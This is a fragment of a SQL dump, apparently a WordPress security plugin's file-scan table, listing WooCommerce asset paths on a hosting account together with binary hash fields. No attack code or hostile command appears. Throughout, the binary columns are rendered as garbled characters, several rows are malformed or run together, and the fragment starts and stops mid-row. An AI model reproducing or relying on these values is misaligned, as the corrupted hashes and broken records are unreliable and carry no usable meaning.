-;VN_\ZT','',0,'?'),('~9-:#Cn','wp-content/plugins/woocommerce/assets/css/menu.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/menu.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-xl-#,','0\ne}\"Ӵ(u\n\\PPj3%*','',0,'?'),('pBPu,a>','wp-content/plugins/woocommerce/assets/css/network-order-widget-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/network-order-widget-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\2RfY\'q.@','vZTh#DgB*','wp-content/plugins/woocommerce/assets/css/photoswipe/default-skin/default-skin.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/photoswipe/default-skin/default-skin.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɯL9$','A_C {.:hQ{2N','',0,'?'),('JF~@a\rc','wp-content/plugins/woocommerce/assets/css/photoswipe/default-skin/default-skin.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/photoswipe/default-skin/default-skin.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WZMwg)C','5#tjVc6\nPn1o\'','',0,'?'),('[Ms\"+Z','wp-content/plugins/woocommerce/assets/css/photoswipe/default-skin/preloader.gif','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/photoswipe/default-skin/preloader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JHZ򧉲:','j.O멆3\"aթZ1ݷ_','',0,'?'),('X]-1PR15rP','wp-content/plugins/woocommerce/assets/css/photoswipe/photoswipe.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/photoswipe/photoswipe.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ǐ~lC(~','٭;YC|=.(','',0,'?'),('s2c^|,','wp-content/plugins/woocommerce/assets/css/photoswipe/photoswipe.min.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/photoswipe/photoswipe.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\X2fz','GusQqձra^Yi','',0,'?'),('\\`2\\Xo,Q{@','wp-content/plugins/woocommerce/assets/css/prettyPhoto-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/prettyPhoto-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nc•~hƙ',':, t6QGab& 12C','',0,'?'),('fw}WE~Q\"%','wp-content/plugins/woocommerce/assets/css/prettyPhoto.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/prettyPhoto.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`(W,TnNK','Hv0\'-oyv+( =','',0,'?'),('eӵ| }','wp-content/plugins/woocommerce/assets/css/prettyPhoto.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/prettyPhoto.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D=\'UEv&2c','DA','[IbƅUg`ܪ7/4LŶٸ7','',0,'?'),('x;, ae,\r','wp-content/plugins/woocommerce/assets/css/privacy.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/privacy.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ls\0!z Ǖ,JkP4','E\\T4ь7zvvD÷ϗtyKf','o\0U\r$y0 R2~{','',0,'?'),('Vf6A]0\"','wp-content/plugins/woocommerce/assets/css/reports-print.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/reports-print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oO71/-cy\n','>qa sr&F*=/by]a֏','',0,'?'),('1b\r2la]߸','wp-content/plugins/woocommerce/assets/css/reports-print.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/reports-print.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','={yv&PPm','`]ٳN.dEдҿ\rW','',0,'?'),('=M9gU(','wp-content/plugins/woocommerce/assets/css/select2.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/select2.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Pt$\"V','t?#g2)j1j5⿕B','',0,'?'),('pC@Sd\n`','wp-content/plugins/woocommerce/assets/css/select2.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/select2.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y\nρFD y','u ސdP=ոP[-]mMj','',0,'?'),('!BjRSK3I','wp-content/plugins/woocommerce/assets/css/twenty-nineteen-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-nineteen-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',2)s_\nj','U28p5\r7pUQ2','',0,'?'),('?F-e/b[ ','wp-content/plugins/woocommerce/assets/css/twenty-nineteen.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-nineteen.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<۬HOĿE','A}a7I\'3 z/fQc\\','',0,'?'),('EM~GGn@?\'','wp-content/plugins/woocommerce/assets/css/twenty-nineteen.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-nineteen.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>bQ\0:$ &!5','[C:8\0onIl\ZLFv^^pW','',0,'?'),(']C>%lS','wp-content/plugins/woocommerce/assets/css/twenty-seventeen-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-seventeen-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/23`,⏽','U4_\0K,X.\"n\\','',0,'?'),('6\r2T0 rˣZ','wp-content/plugins/woocommerce/assets/css/twenty-seventeen.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-seventeen.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(\"Y 3','o(C65-VBji_\0T#','',0,'?'),('vwm1=','wp-content/plugins/woocommerce/assets/css/twenty-seventeen.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-seventeen.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',') +\ZleCA','.MTDCw!֧㋝','',0,'?'),('P3_w`lmp','wp-content/plugins/woocommerce/assets/css/twenty-twenty-one-admin-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-one-admin-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O-h1wU1\'','qh9S-l[@=!Tvs','',0,'?'),(' bjPi(','wp-content/plugins/woocommerce/assets/css/twenty-twenty-one-admin.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-one-admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O-h1wU1\'','qh9S-l[@=!Tvs','',0,'?'),('zwy$dލ','wp-content/plugins/woocommerce/assets/css/twenty-twenty-one-admin.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-one-admin.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZTг \r[','i8Aw\0F֨yt+U G/P','',0,'?'),('5Y/n n(','wp-content/plugins/woocommerce/assets/css/twenty-twenty-one-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-one-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ОN?r','j.I;j1 L$(ByBW>','',0,'?'),('vY\0ՑA','wp-content/plugins/woocommerce/assets/css/twenty-twenty-one.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-one.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ƌap1*,&#','LݬktYt4I}\rYA','',0,'?'),('\0#bՠU','wp-content/plugins/woocommerce/assets/css/twenty-twenty-one.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-one.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y 1Τ5X','6#ۖɭRܮ. `+=w^O\0','',0,'?'),(';u~^;','wp-content/plugins/woocommerce/assets/css/twenty-twenty-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fٲƌ Re','D㷪Ɇ*9fXGQPI|ct','',0,'?'),(' 9V82ֶ','wp-content/plugins/woocommerce/assets/css/twenty-twenty-three-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-three-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\IBF9,','Nj]{[M΋/V?:H_J','',0,'?'),('``M[vr,jpuw','wp-content/plugins/woocommerce/assets/css/twenty-twenty-three.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-three.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JO[[?g','&8jڶݒht$CxfYONV(3N','',0,'?'),('. ݫ %S','wp-content/plugins/woocommerce/assets/css/twenty-twenty-three.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-three.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7LI \0','%s$\\;/~^Fv,OR&Wz','',0,'?'),('R=x38^\\','wp-content/plugins/woocommerce/assets/css/twenty-twenty-two-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-two-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?6jSS)*','ل Զ%PK(muZdm','',0,'?'),('t}+Az)֧h齤J','wp-content/plugins/woocommerce/assets/css/twenty-twenty-two.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-two.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d9\n','rDu=lSK-4bdK?^ىr','',0,'?'),(' x9w_+6N','wp-content/plugins/woocommerce/assets/css/twenty-twenty-two.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty-two.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-*\0#Ԁ5-V\r','ǕX lVmIj(ƾC','',0,'?'),('RnwdMN~','wp-content/plugins/woocommerce/assets/css/twenty-twenty.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',gOY/u','w\0ϛS;~T ztI`ʛ','',0,'?'),('I.B7^ fH\n','wp-content/plugins/woocommerce/assets/css/twenty-twenty.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/twenty-twenty.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YpLZW','^P%jes)]E~6@`Ir','',0,'?'),(' \0])2 >F','wp-content/plugins/woocommerce/assets/css/wc-setup-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/wc-setup-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uW ~','O4էTReZ5R)>','',0,'?'),('\ZM-<\'^','wp-content/plugins/woocommerce/assets/css/wc-setup.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/wc-setup.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~T_>^=!DG','Q fG \rv4LF J$:','',0,'?'),('9=@#:@8','wp-content/plugins/woocommerce/assets/css/wc-setup.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/wc-setup.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gIbu?6AR6n','ޑ*3Yz9B@oX>G K^U','',0,'?'),('֯MKԖ','wp-content/plugins/woocommerce/assets/css/woocommerce-blocktheme-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-blocktheme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A\'qYD|Θ~',';:A\n ;LqCʄ;?@0U','',0,'?'),('6D^IIݶNDğ\r','wp-content/plugins/woocommerce/assets/css/woocommerce-blocktheme.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-blocktheme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gy=O{z;M\0+','>\\gC[*-Q@=','',0,'?'),('1;uH4','wp-content/plugins/woocommerce/assets/css/woocommerce-blocktheme.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-blocktheme.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m•Z',' Pu<8isB6 \r͓>','',0,'?'),('HnM86&CDMMN','wp-content/plugins/woocommerce/assets/css/woocommerce-layout-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':vig`[','GkϡW9`۴nN8Ko ','',0,'?'),('fbbKJ','wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yZ~u_','b/3A\\b;Pn\"NnL\\','',0,'?'),('5Ǯ{:&kT','wp-content/plugins/woocommerce/assets/css/woocommerce-layout.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ;b\" ','&v<1H:|,P,','',0,'?'),('LLG=Z0C\'Pu','wp-content/plugins/woocommerce/assets/css/woocommerce-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y8(=@t\n]L','6GB=FTb՟ΓQWH~&','',0,'?'),('h;THlEDv[','wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b(=ڡ#!','\"F77d6gSjSuPŖ','',0,'?'),('YM~B\'','wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')b\'Y#͑1\r','nv\n/x2yxI','',0,'?'),('ۡ`A;ʾ','wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EKCJ!_mx<','XxD5-A52Ys*SxD','',0,'?'),('=uܑ','wp-content/plugins/woocommerce/assets/css/woocommerce.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h3=h',']GNFr`g5U2\r: &G','',0,'?'),('oQAީc#','wp-content/plugins/woocommerce/assets/css/woocommerce.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/woocommerce.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/9 L\0P(JWmJ\r','hjg:ug@T>LzT','',0,'?'),('Iy#','',0,'?'),('4Pк09\Z','wp-content/plugins/woocommerce/assets/fonts/star.woff','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/fonts/star.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3\\`|U2\'','#19#~C9DеeH','',0,'?'),('BV','wp-content/plugins/woocommerce/assets/images/admin_notes/dashboard-widget-setup.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/admin_notes/dashboard-widget-setup.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','={R)','',0,'?'),('`F\ZTt/','wp-content/plugins/woocommerce/assets/images/admin_notes/filter-by-product-variations-note.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/admin_notes/filter-by-product-variations-note.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' N֛6\nU W[=t','R\'ucaPFGr ','',0,'?'),('1Hĸ)`a','wp-content/plugins/woocommerce/assets/images/admin_notes/marketing-jetpack-2x.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/admin_notes/marketing-jetpack-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t#0\0f','A2f(u2E\"s?Ҵ\n+g@[4\nq/=.','',0,'?'),('}}{rgg','wp-content/plugins/woocommerce/assets/images/core-profiler/logo-jetpack.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/core-profiler/logo-jetpack.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f[Hp=|-&','hš sĄ~Oht ','wp-content/plugins/woocommerce/assets/images/core-profiler/logo-mailpoet.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/core-profiler/logo-mailpoet.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3\' <`Z','U}ypq>L*r J','',0,'?'),('O4S7','wp-content/plugins/woocommerce/assets/images/core-profiler/logo-pinterest.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/core-profiler/logo-pinterest.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<ݝt؊mD=$f','#e noR','wp-content/plugins/woocommerce/assets/images/core-profiler/logo-woo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/core-profiler/logo-woo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r6DG>l','s-\ZF*ؤA}9\rI[','',0,'?'),('r\r\n./t\ni=Cy','wp-content/plugins/woocommerce/assets/images/dashboard-widget-setup.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/dashboard-widget-setup.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','( B)4','Ѣ 4jD~v*Z1-C)\Zs','',0,'?'),('n;O ;Jaŗ;','wp-content/plugins/woocommerce/assets/images/empty-content.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/empty-content.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6t\\bg','ѓ\n*Bog\'˼SQ','',0,'?'),('E78융wZ=','wp-content/plugins/woocommerce/assets/images/eway-logo.jpg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/eway-logo.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-eͺ%GcZI','}8R!!*uŨk|#bӷr]','',0,'?'),('\r9~)Eh','wp-content/plugins/woocommerce/assets/images/help.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/help.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q5jl)\r)','-\0~kH?p/IӴ-f.Q','',0,'?'),('Ldh?چ?[','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/amex.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/amex.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}X4f&뫐','T=xfѴnQW/R.ꖾ8$','',0,'?'),(':k$o>1d','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/amex.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/amex.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6Q4Vr','p4fEPN.:,xaX','',0,'?'),('F[xYYt>x2','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/diners.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/diners.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Խuu4>`','J}45==ƬGʢڒ85:','',0,'?'),('oaʥʬTH}t','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/diners.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/diners.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sn݄D?.','D\\j*Ciï77\nJ:^L@EI','',0,'?'),('pfkN~','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/discover.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/discover.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߾ CLFé$[','~8.\\iM9۰h','',0,'?'),(')D@#*) :MGib L&','',0,'?'),('#]\r=كv','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/jcb.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/jcb.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','؜A~ht\"Ga','\Z\ZHF $lwz,K܄','',0,'?'),('@hCf˻xo\'','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/laser.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/laser.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\8ջh','hHΐb;<]VĤEmK','',0,'?'),('62&e5','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/laser.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/laser.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2f6g)B','8QjV\'4Ⰻ̎n\0b(Ό','',0,'?'),('@f iz3}-y','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/maestro.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/maestro.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':J^{:*pPR\"','kRTP B?Tţ d=\'5Zi','',0,'?'),('~3OKxh| ','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/maestro.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/maestro.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z}Ԇ,Y?k<',' t3831>Y#vB=','',0,'?'),('#c 4m\"CK ','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/mastercard.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/mastercard.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+hk7x','\0,c#u4sJrs Ք9','',0,'?'),('I-gfE݇0m','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/mastercard.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/mastercard.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3c״ѕ)d','(\0\0.kߦ0w/:Ç9N_q','',0,'?'),('շ5CE/.Q','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/visa.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/visa.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~SY\' ',' :q5Jwo>TF+77\Z58Y','',0,'?'),('Au\\AU','wp-content/plugins/woocommerce/assets/images/icons/credit-cards/visa.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/visa.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yWkM6z','W!Q>nΣx!_\r;F','',0,'?'),('ܶO;hTI ','wp-content/plugins/woocommerce/assets/images/icons/edit.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/edit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fjexwtU','A.|wݙۆߜ4UBv>*\Z#݀','',0,'?'),('\nSk~','wp-content/plugins/woocommerce/assets/images/icons/external-link.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/external-link.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߷gSR#{','9T]%sL=>_)','',0,'?'),('5J.eH]&w','wp-content/plugins/woocommerce/assets/images/icons/global-attributes-icon.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/global-attributes-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M|yò+\'_','b] (lh~q#s݊%qͰ','',0,'?'),(' iE\Z;hq |','wp-content/plugins/woocommerce/assets/images/icons/gridicons-checkmark.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/gridicons-checkmark.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9 ^I\Z.ԛh&','\\ќEk#h\ZN','',0,'?'),('볃_dDى','wp-content/plugins/woocommerce/assets/images/icons/gridicons-chevron-down.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/gridicons-chevron-down.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*9\"\0tR:M','fxl:V~H&(\Z0EB/','',0,'?'),('Bdũ%ug','wp-content/plugins/woocommerce/assets/images/icons/info.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/info.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v8T Rʯ韷B','UTd| e_%/~gkw֘','',0,'?'),('ov?)!y','wp-content/plugins/woocommerce/assets/images/icons/loader.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/loader.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r7c)[ w ^','Be vO+\Z*eҿW3~','',0,'?'),('J#:2!xCAY','wp-content/plugins/woocommerce/assets/images/icons/star-golden.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/star-golden.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?2?!޳G܄','rCF7\0᫖A&thJ','',0,'?'),('d;`7G','wp-content/plugins/woocommerce/assets/images/icons/star-gray.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/star-gray.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_?Ә','Gn` \nsyԓSL','',0,'?'),('Bx9$6LEF|Q','wp-content/plugins/woocommerce/assets/images/icons/star-half-filled.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/star-half-filled.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H^$A^w?','<2P1V8JCR3Uo:&lX','',0,'?'),(' \\ӱ? ˹','wp-content/plugins/woocommerce/assets/images/klarna-black.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/klarna-black.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z%iR$u:','\\8]%Ƶ*/>TlkΟJ=','',0,'?'),(')A4/Fɬ','wp-content/plugins/woocommerce/assets/images/marketing/amazon-ebay.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/marketing/amazon-ebay.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`7߀Pm','#EDFc80@)}J~%','',0,'?'),('Zh!{Df6','wp-content/plugins/woocommerce/assets/images/marketing/automatewoo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/marketing/automatewoo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z|) ',')\nʾ{B2HG|ڒ%.Bp2\0','',0,'?'),('\0RAөib8','wp-content/plugins/woocommerce/assets/images/marketing/creative-mail-by-constant-contact.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/marketing/creative-mail-by-constant-contact.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9\"9x~ɸ','t⨯JS݄\0C*r8\n$\r','',0,'?'),('\r\Z>V|_mw','',0,'?'),('5R˵{ 